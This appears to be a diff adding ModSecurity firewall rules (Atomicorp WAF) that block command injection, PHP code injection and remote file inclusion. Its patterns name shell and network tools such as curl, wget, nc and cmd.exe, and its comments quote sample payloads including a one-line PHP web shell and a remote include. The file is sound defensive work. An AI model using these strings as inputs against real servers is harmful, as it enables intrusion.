+SecRule REQUEST_URI "(?: ?(?:\bcurl\b|(?:w|ftp)get) (?:http|(?:s|t)?ftp|\- |dict|smb|file|gopher|imap|ldap|pop|rt|scp|smtp|telnet)| ?(?:cmd|command) ?= ?(?:chdir|mkdir|rm) |cd /(?:tmp|/var/tmp|/etc/|/proc|\.\.) |\|id ?\; ?echo.{1,200}\||\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|r?cmd|ftp)\.exe\b|c(?:md|ommand)(?:(?:32)?\.exe\b|\b /[ck])))" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:cmdline,t:normalizePath,t:replaceNulls,chain,id:340193,rev:17,severity:2,msg:'Atomicorp.com WAF Rules: CMD injection in URI',logdata:'%{TX.0}',tag:'Command Injection'"
+SecRule REQUEST_URI "!(?:/count\.cgi|^/magento/index\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" "t:none,t:lowercase"
+
+
+# Rule 340018:
+#Generic command line attack filter
+#SecRule REQUEST_URI "\|.*;.*;.*\|" "phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,chain,id:340018,rev:10,severity:2,msg:'Atomicorp.com WAF Rules: Generic command line attack filter',logdata:'%{TX.0}'"
+#SecRule REQUEST_URI "!(?:/count\.cgi|^/magento/index\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" "t:none,t:lowercase"
+
+# Rule 340029: script, perl, etc. code
+SecRule REQUEST_URI|ARGS|!ARGS:/canvas/|!ARGS:screenshot_png|!ARGS:/^acf/|!ARGS:fileContent|!ARGS:/_edit_/|!ARGS:/details/|!ARGS:/signature/|!ARGS:/block_value/|!ARGS:/News/|!ARGS:/products_/|!ARGS:/article/|!ARGS:/template/|!ARGS:editor1|!ARGS:prefix|!ARGS:suffix|!ARGS:/info/|!ARGS:__VIEWSTATE|!ARGS:payment_extrainfo|!ARGS:file|!ARGS:thecode|!ARGS:/chat/|!ARGS:snippet|!ARGS:/phpcode/|!ARGS:intro|!ARGS:/title/|!ARGS:/data_parent/|!ARGS:code|!ARGS:lajmi|!ARGS:/vgo_ee/|!ARGS:/content/|!ARGS:/desc/|!ARGS:/hilit/|!ARGS:/hilight/|!ARGS:/highlight/|!ARGS:/body/|!ARGS:/post/|!ARGS:/txt|!ARGS:/content/|!ARGS:/keyword/|!ARGS:/summary/|!ARGS:/note/|!ARGS:/solution/|!ARGS:/msg/|!ARGS:/highlight/|!ARGS:/text/|!ARGS:/subject/|!ARGS:st|!ARGS:/message/|!ARGS:/post/|!ARGS:/resolution/|!ARGS:/problem/|!ARGS:/disallowed/ "(?:;|/|\| )(?:\b(?:cat|ls|perl|uname|pwd|cp|tclsh8?|cpp|f(?:etch|tp)|python|chown|rm|ping|rsync|rdiff-backup|scp|(?:w|ftp)get|curl|links|g\+\+|ch(?:grp|own)|passwd|r?(?:b|d)ash|t?c?sh|telnet|clang|nc)\b |\b(?:sleep|benchmark)\b \(? ?[0-9]|powershell -w|\bkill(?: (?:[0-9]|-)|all\ ))" "log,auditlog,phase:2,deny,log,status:403,capture,id:340029,t:none,t:utf8toUnicode,t:urlDecodeUni,t:replaceNulls,t:cmdLine,rev:40,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked - command in REQUEST_URI or Argument',logdata:'%{TX.0}'"
+
+
+# Rule 340030: generic command line attack
+SecRule REQUEST_URI "\|*(?:id|echo|uname|pwd) ?\;" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,chain,id:340030,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Pipe command line probe'"
+SecRule REQUEST_URI "(?:id|echo|uname) ?; ?\|"
+
+SecMarker END_CMD_INJECTION_RULE_1
+
+#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|js|css|ico|avi|w(?:mv|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x))$" phase:2,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_CMD_INJECTION_RULE_2
+#Possible command injection attack
+#SecRule ARGS "`" "phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,multimatch,pass,nolog,noauditlog,skip:1"
+#SecAction phase:2,pass,nolog,noauditlog,skipAfter:END_CMD_INJECTION_RULE_2
+#
+#SecRule ARGS "` ?`.*\+ ?\".*` ?`"         "capture,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,multimatch,auditlog,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Command Injection Attack',id:'380014',rev:1,severity:'2'"
+#
+#SecMarker END_CMD_INJECTION_RULE_2
+
+#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|js|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" phase:2,id:333949,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_CMD_INJECTION_RULE_3
+#
+#SecRule ARGS|!ARGS:areas|!ARGS:/template/ "`" "phase:2,id:333808,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+#SecAction phase:2,id:334369,t:none,pass,nolog,noauditlog,skipAfter:END_CMD_INJECTION_RULE_3
+#
+#SecRule ARGS "` ?`.*\+ ?\".*` ?`"         "phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,auditlog,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Command Injection Attack',id:'380015',rev:1,severity:'2'"
+#SecMarker END_CMD_INJECTION_RULE_3
+
+################# BAD FUNCTION RULES #########################
+
+
+# Rule 340082: SMTP redirects
+SecRule REQUEST_URI_RAW "^(?:(?:ht|f)tps?|connect):/.+\:(25|465|587)"  "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:340082,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: SMTP redirect over http attempt'"
+
+#types that do not have RFI at all
+SecRule TX:STATIC "@eq 1" "phase:2,id:'334817',pass,t:none,nolog,noauditlog,skipAfter:END_INJECTION_RULES_ALL"
+
+#parallel skip
+SecRule REQUEST_URI|REQUEST_HEADERS|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|ARGS_NAMES|XML:/* "@pm include post_ onerror python printf bin ifs cat" "phase:2,id:344375,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeComments,t:removewhitespace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334373,t:none,pass,nolog,noauditlog,skipAfter:END_CMD3_ALL"
+
+#<?=$_POST[0]?>
+#GET /<!--#include+file=”UUUUUUUU...UU”--> HTTP/1.1
+SecRule REQUEST_URI|REQUEST_HEADERS|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|!ARGS:/message/|ARGS_NAMES|XML:/* "<(?:\!--\#includefile=|\?=\$_post\[0\])" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeComments,t:removewhitespace,t:lowercase,msg:'Atomicorp.com WAF Rules: Code injection',id:380027,rev:2,logdata:'%{TX.0}',severity:'2',tag:'RCE'"
+
+#python/object/new
+SecRule REQUEST_URI|REQUEST_HEADERS|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|!ARGS:/message/|ARGS_NAMES|XML:/* "(?:\!python/object/new|onerrorresumenext\:function)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeComments,t:removewhitespace,t:lowercase,msg:'Atomicorp.com WAF Rules: Code injection',id:380028,rev:1,logdata:'%{TX.0}',severity:'2',tag:'RCE'"
+
+#$IFS$
+SecRule REQUEST_URI|REQUEST_HEADERS|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|!ARGS:/message/|ARGS_NAMES|XML:/* "\$IFS\$" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeComments,t:removewhitespace,t:lowercase,msg:'Atomicorp.com WAF Rules: Code injection',id:344377,rev:1,logdata:'%{TX.0}',severity:'2',tag:'RCE'"
+
+#(printf
+#|/bin/id|
+#; cat /
+SecRule REQUEST_URI|REQUEST_HEADERS|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|!ARGS:/message/|ARGS_NAMES|XML:/* "(?:\(printf|\| ?/bin/id ?\|; cat /)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeComments,t:compresswhitespace,t:lowercase,msg:'Atomicorp.com WAF Rules: Code injection',id:344376,rev:1,logdata:'%{TX.0}',severity:'2',tag:'RCE'"
+
+SecMarker END_CMD3_ALL
+
+#additional types
+SecRule REQUEST_FILENAME "(?:\.(?:cgi|js(?:on|f|pa?)|pl|aspx?|cfml?|do)$|/cgi-?(?:bin|cdn)/|/[a-z]+-cgi/)" "phase:2,id:333810,pass,setvar:tx.nonphp=1,t:none,nolog,noauditlog,skipAfter:END_INJECTION_RULES_ALL"
+
+#Bad function rules
+# Rule 340019:
+#Generic PHP bad functions protection
+#PHP copy() function: http://securitytracker.com/alerts/2006/Apr/1015882.html
+SecRule ARGS "compress\.zlib ?:" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340019,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic PHP bad functions protection'"
+
+#RFI/injection rules
+SecRule ARGS|REQUEST_URI|!ARGS:templatecode|!ARGS:areas|!ARGS:/url/|!ARGS:SAMLResponse "@pm http:// https:// ftp:// ftps:// ogg:// tls://  data:// php:// zlib:// gopher:// compress.zlib connect phar:// rar:// expect:// zip:// ssh2:// dict:// ssh:// file:// ssl:// glob:// s3:// scp://" "phase:2,id:333812,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334370,t:none,pass,nolog,noauditlog,skipAfter:END_INJECTION_RULES_ALL"
+
+#pdf, which may have an arg as part of an XSS attack but no other RFI methods
+SecRule REQUEST_FILENAME "\.pdf$" "phase:2,id:333813,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES"
+
+SecRule REQUEST_FILENAME "\.(?:xml|html?)$" "phase:2,id:333811,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_1"
+
+#Skip these rules if its not a POST or GET
+SecRule REQUEST_METHOD "!(?:GET|POST)" "id:382191,phase:2,t:none,skipAfter:END_INJECTION_RULES_1,nolog,noauditlog,pass"
+
+
+# Rule 340162: Generic PHP code injection protection in URI w/ anti-evasion
+SecRule REQUEST_URI "(?:/(?:(?:wp-admin/(page|post|widgets|link|network/site-settings\.php|options|themes/basic/themify/img\.php\?src=|admin\.php?cf/cf\.php)|admin/(?:edittemplate|webpage_update|theme-options|add_edit_)|(?:signup|cpinquiry|profile))\.php|p(?:(?:hpbb\/install\/install\.ph|l\/download\?file=htt)p|roxy\/cb_proxy\.\?a=http:\/\/)|i(?:ndex\.php\/admin\/system_config\/save\/section\/payment\/|mp\/compose\.php)|tiki-(?:objectpermissions|editpage|view_cache)|jomsocial\/[a-z]+\/(?:edit|add))|^(?:\/(?:(?:[a-z0-9\-]+\/events\?(?:utm_|trk_)|node\/[0-9]+\/(?:edit|add)|[a-z]+\/unsubscribe)|(?:mysqldumper\/dump|xmlrpc)\.php$|go\.php\?u=affilorama&t=http:\/\/|\.services\/sitelogout)|/(?:b/ss/mxmacromedia|horde/services/go|node/add|cas/))|(?:(?:jw_allvideos_player|mod_mp3player)\?(?:file|playlist)=htt|ubbthreads\/admin\/dofeatures\.ph)p|ad-?server\/adjs|\?mode=addshout|^/administrator/index\.php\?option=com_rsform|^/index\.php/profile/register/registerprofile|^/[a-z]+/edit|^/(?:elements|admin/media)/(?:s(?:ave|ettings?)|appearance)/|^/panel\?comd=nlwebform|^/cocms/index\.php\?|^/ls_javascript_combine/|^/index\.php\?option=com_rsform|^/killboard/\?a=admin_idfeedsyndication|^/api/users|^/numo/module/form_handler/|^/admin/add_edit_document|^/\?br=|^/app\.php/dl_ext/\?view=upload|^/index\.php\?option=com_uniform|^/\?_task=mail|^/index\.php\?p=admin/actions/elements/|^/?amoptimizer_bundle_check|^/\?wc-ajax|^/index\.php\?get=film&doaction=resultat)" "phase:2,id:333814,rev:6,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_1"
+
+#SecRule ARGS "!@pmFromFile trusted-domains.txt" chain
+SecRule ARGS|!ARGS:/^acf/|!ARGS:sld|!ARGS:carpeta|!ARGS:/wpforms/|!ARGS:imej|!ARGS:/saml/|!ARGS:/affwp/|!ARGS:/reason/|!ARGS:/container/|!ARGS:r|!ARGS:/^colissimo/|!ARGS:/refid/|!ARGS:/r3f5x9JS/|!ARGS:chl|!ARGS:/^tw247/|!ARGS:ujk|!ARGS:loc_db|!ARGS:/^woo/|!ARGS:pwd|!ARGS:/^objectTo/|!ARGS:1_1_8|!ARGS:/journal/|!ARGS:username|!ARGS:video|!ARGS:/website/|!ARGS:replace|!ARGS:/cdn/|!ARGS:/^xing/|!ARGS:ads|!ARGS:directories|!ARGS:/bookmark/|!ARGS:/case_name/|!ARGS:f_success|!ARGS:f_error|!ARGS:name|!ARGS:/userOption/|!ARGS:/brochure/|!ARGS:/target/|!ARGS:/^_d$/|!ARGS:klarna_order|!ARGS:/to$/|!ARGS:/schema/|!ARGS:protocol|!ARGS:str|!ARGS:/query/|!ARGS:/from/|!ARGS:/forward/|!ARGS:/^addon-/|!ARGS:/_script/|!ARGS:/graphic/|!ARGS:/virtuemart/|!ARGS:UF_VK|!ARGS:/powermail/|!ARGS:mp4|!ARGS:/confirmation/|!ARGS:/cloudflare/|!ARGS:/^ref_/|!ARGS:/hsw_ash/|!ARGS:/_online_/|!ARGS:/home/|!ARGS:installFull|!ARGS:b2w|!ARGS:/email/|!ARGS:term|!ARGS:/source_array/|!ARGS:/button/|!ARGS:/bestand/|!ARGS:/^request/|!ARGS:m_wb|!ARGS:/customfield/|!ARGS:/keyword/|!ARGS:embed|!ARGS:/cmsform/|!ARGS:/title/|!ARGS:social_network|!ARGS:scope|!ARGS:fb|!ARGS:/^vfb-/|!ARGS:to|!ARGS:pu|!ARGS:sima|!ARGS:/movie/|!ARGS:dns|!ARGS:contact_info|!ARGS:source_code|!ARGS:/_form/|!ARGS:listserv|!ARGS:p_zoho|!ARGS:sugarroot|!ARGS:cyswllt|!ARGS:/^attribute/|!ARGS:/^channel/|!ARGS:/^wdf_joodb/|!ARGS:/^replacer/|!ARGS:/^option/|!ARGS:/css_frame/|!ARGS:ad_code|!ARGS:tickets|!ARGS:war|!ARGS:slug|!ARGS:/whereto/|!ARGS:/search/|!ARGS:pack|!ARGS:origem|!ARGS:/extra_info/|!ARGS:str_sitio|!ARGS:post-id|!ARGS:xml|!ARGS:/metatags/|!ARGS:radio|!ARGS:shire|!ARGS:/^svc_id/|!ARGS:RelayState|!ARGS:ds_source|!ARGS:/^si_contact_/|!ARGS:next|!ARGS:clip|!ARGS:kotisivu|!ARGS:mb|!ARGS:jibber|!ARGS:pattern_select|!ARGS:wordpress_extra|!ARGS:origin|!ARGS:fail|!ARGS:success|!ARGS:move_to|!ARGS:/^es-field/|!ARGS:/^listingfields/|!ARGS:svc_id|!ARGS:/^constant_contact/|!ARGS:hq|!ARGS:/flsrv/|!ARGS:svc_id|!ARGS:junkWords|!ARGS:/foto/|!ARGS:/^attr_/|!ARGS:name_ip|!ARGS:/stream/|!ARGS:canonical|!ARGS:/addy/|!ARGS:rel_path|!ARGS:aim|!ARGS:api|!ARGS:details|!ARGS:/^field/|!ARGS:profile_id|!ARGS:/^complete_action/|!ARGS:/buzz/|!ARGS:cc_list_id|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:/xcpr_/|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/live$/|!ARGS:/tripadvisor/|!ARGS:/itune/|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/^pass/|!ARGS:/password/|!ARGS:/note/|!ARGS:/form_/|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:/^input_/|!ARGS:embed_code|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:dest|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:application|!ARGS:refsrc|!ARGS:hp|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:loc|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/photo/|!ARGS:/media/|!ARGS:parent_name|!ARGS:back|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/twitter/|!ARGS:/flickr/|!ARGS:/youtube/|!ARGS:/blog/|!ARGS:/vid/|!ARGS:_update_failure|!ARGS:_update_success|!ARGS:importremote|!ARGS:hdwok|!ARGS:hdwnook|!ARGS:OpenID|!ARGS:/^akID/|!ARGS:/^hilit/|!ARGS:/reciprocal/|!ARGS:/callback/|!ARGS:subject|!ARGS:/sponsors/|!ARGS:want2Read|!ARGS:direct|!ARGS:/thumb/|!ARGS:fflv|!ARGS:direct|!ARGS:source_location|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:wlp|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:go|!ARGS:/^utm/|!ARGS:resolution|!ARGS:/export/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:ucapi|!ARGS:/click/|!ARGS:rf|!ARGS:sourcetitle|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:/^win/|!ARGS:lec_rm|!ARGS:n-state|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:/server/|!ARGS:confirm|!ARGS:/^groups/|!ARGS:prodDownload|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:/body/|!ARGS:/^product_long_/|!ARGS:/content/|!ARGS:/banner/|!ARGS:heading|!ARGS:cl_post|!ARGS:/msg/|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:customer_footer|!ARGS:FAQTitle|!ARGS:/host/|!ARGS:/text/|!ARGS:/Piwik/|!ARGS:admin_footer|!ARGS:showStr|!ARGS:/http/|!ARGS:fetch|!ARGS:/txt/|!ARGS:mesg|!ARGS:forward|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:footer_scripts|!ARGS:u|!ARGS:/header/|!ARGS:action|!ARGS:cptpl_dir|!ARGS:arg6|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:cat_sponsor|!ARGS:stretch|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:/usps_label/|!ARGS:/story/|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:soundname|!ARGS:/^bbcode_/|!ARGS:/vimeo/|!ARGS:/link/|!ARGS:request_uri|!ARGS:/shopvk/|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:Comentario|!ARGS:/^dynadata/|!ARGS:paypal_ipn|!ARGS:title|!ARGS:/frame/|!ARGS:l1_bdy|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:uri|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:base1|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:source|!ARGS:set_static_uri_to|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:sig|!ARGS:KT_Update1|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:sm_b_style|!ARGS:success|!ARGS:/^css/|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:revnews_ad_120|!ARGS:/icon/|!ARGS:/ftp/|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:answer|!ARGS:intro|!ARGS:/about_us/|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:problem|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:helpbox|!ARGS:redir|!ARGS:ret|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:stories_cat|!ARGS:view|!ARGS:howhear|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:/signature/|!ARGS:disc|!ARGS:utmr|!ARGS:Query|!ARGS:steps|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:storage_path|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:/^wimpy/|!ARGS:/_ref/|!ARGS:/^pr_/|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:ret|!ARGS:area|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:st_widget|!ARGS:def|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:/GlobalFooter/|!ARGS:/^dynafield/|!ARGS:wysiwyg|!ARGS:banner|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:/license/|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:/^k2extra/|!ARGS:github|!ARGS:linkedin|!ARGS:stack_overflow "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)://(.*)$"  "phase:2,deny,log,auditlog,status:403,capture,id:340162,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,chain,rev:308,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection Attack detected (Unauthorized URL detected as argument)',logdata:'%{TX:0},%{matched_var_name}'"
+SecRule TX:1 "!@beginsWith %{request_headers.host}" "t:none,t:lowercase"
+#SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/" "t:none,t:urlDecodeUni,t:lowercase"
+
+
+#if its not encoded (which is why we dont use the transform), skip it as its already been reviewed in 340162
+SecRule REQUEST_URI "=(?:ht|f)tps?://" "phase:2,id:333815,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_1"
+
+# Rule 340165: Generic PHP code injection protection in URI w/ anti-evasion for encoded cases where ARGS doesnt work
+SecRule REQUEST_URI "\://%{SERVER_NAME}/" "phase:2,id:333816,pass,t:none,t:urlDecodeUni,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_1"
+SecRule REQUEST_URI "(?:(?:site|ur(?:l|i)\]?|s(?:earch|itemap|earch(?:text|key)|ubject|ervice|rc)|r(?:dfrom|equest)|utm_(?:source|term|c(?:tr|ontent))|owa_[a-z0-9]+|value|virtuemart|l(?:oc|ink)|off|war|youtube_id|k(?:eywords?|larna_order)|vid|next|snip?pet|feeds|name_ip|profile_id|details|go|r(?:esource|e(?:turn|f|pository|f?fer))|b(?:inary|vpage|ack|2w)|dns|media|page|hostname|filter[a-z]+|location|img|picture|path|\&u|destination|img_select|pattern_select|target|targetservice|web|referr?er|field-1|image|video|redirect|to|mp4|str|plugin_source|url_spam|chl|refid|r) ?= ?https?://|/\?(?:r(?:eturn|edirect)|redirect_to|br)=http|=https?://localhost/|^/site-content/|^/[a-z0-9\/\-]+/(?:new|edit)/[0-9]+/(?:confirm|edit)$|^/staff/index\.php\?_m=ticket|^/ar/l\?|^/index\.php\?(?:\&eid=powermaileidmarketing|route=checkout/checkout&edit&setting_id=[0-9]+&admin=http)|^/amember/admin-users/autocomplete?term=|^\?amoptimizer_bundle_check)" "phase:2,id:333817,rev:17,pass,t:none,t:urlDecodeUni,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_1"
+
+SecRule REQUEST_URI "!(^/index\.php\?cmd=hbchat|^/wp-admin/admin\.php|cf/cf\.php|^/index\.php\?segment=pageurl|^/wp-admin/post-new\.php\?(calypsoify=[0-9]+)?&?(block-editor=[0-9]+)?&?frame-nonce=[0-9]+\:[0-9]+\:[a-f0-9]+&origin=http)" "chain,phase:2,deny,log,auditlog,status:403,capture,id:340165,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:292,severity:2,msg:'Atomicorp.com WAF Rules: Uniencoded possible Remote File Injection attempt in URI (AE)',logdata:'%{MATCHED_VAR}'"
+SecRule REQUEST_URI "=(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)://" "t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+SecMarker END_INJECTION_RULES_1
+
+
+#include injection attack
+SecRule REQUEST_URI "^/admin/structure/block/manage" "phase:2,id:353896,pass,t:none,t:urlDecodeUni,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_340855"
+##include(http://bad)
+SecRule ARGS|!ARGS:filecontent|!ARGS:/gen_header/|!ARGS:/template/|!ARGS:/content/|!ARGS:/description/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/message/ "include ?\(['\" ]?['\" ]?['\" ]? ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(ht|f)tps?):/" "phase:2,deny,log,auditlog,status:403,capture,id:340855,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Include Remote File Injection attempt in argument',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!(https?://%{SERVER_NAME}/)"
+
+SecMarker END_INJECTION_RULES_340855
+
+# Rule 340031: remote file inclusion generic attack signature
+SecRule REQUEST_URI  "\.(?:dat|gif|jpe?g|png|bmp|txt|vir|dot)\?" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,chain,id:340031,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote file inclusion'"
+SecRule REQUEST_URI|ARGS "(?:(?:pm_path|pagina|path|include_location|root|page|open)=(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)|(?:cmd|command|inc)=)"
+
+SecMarker END_INJECTION_RULES
+
+SecMarker END_INJECTION_RULES_ALL
+
+#types that do not have RFI at all
+SecRule TX:STATIC "@eq 1" "phase:2,id:'334818',pass,t:none,nolog,noauditlog,skipAfter:END_INJECTION_RULES_MULTI"
+
+#additional types
+SecRule TX:NONPHP "@eq 1" "phase:2,id:'333818',pass,t:none,nolog,noauditlog,skipAfter:END_INJECTION_RULES_MULTI"
+
+#File types that may have args, but can not be injected
+SecRule REQUEST_URI "^/eprocservice/supplierinboundservice" "phase:2,id:337819,rev:2,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_MULTI"
+#
+#RFI/injection rules
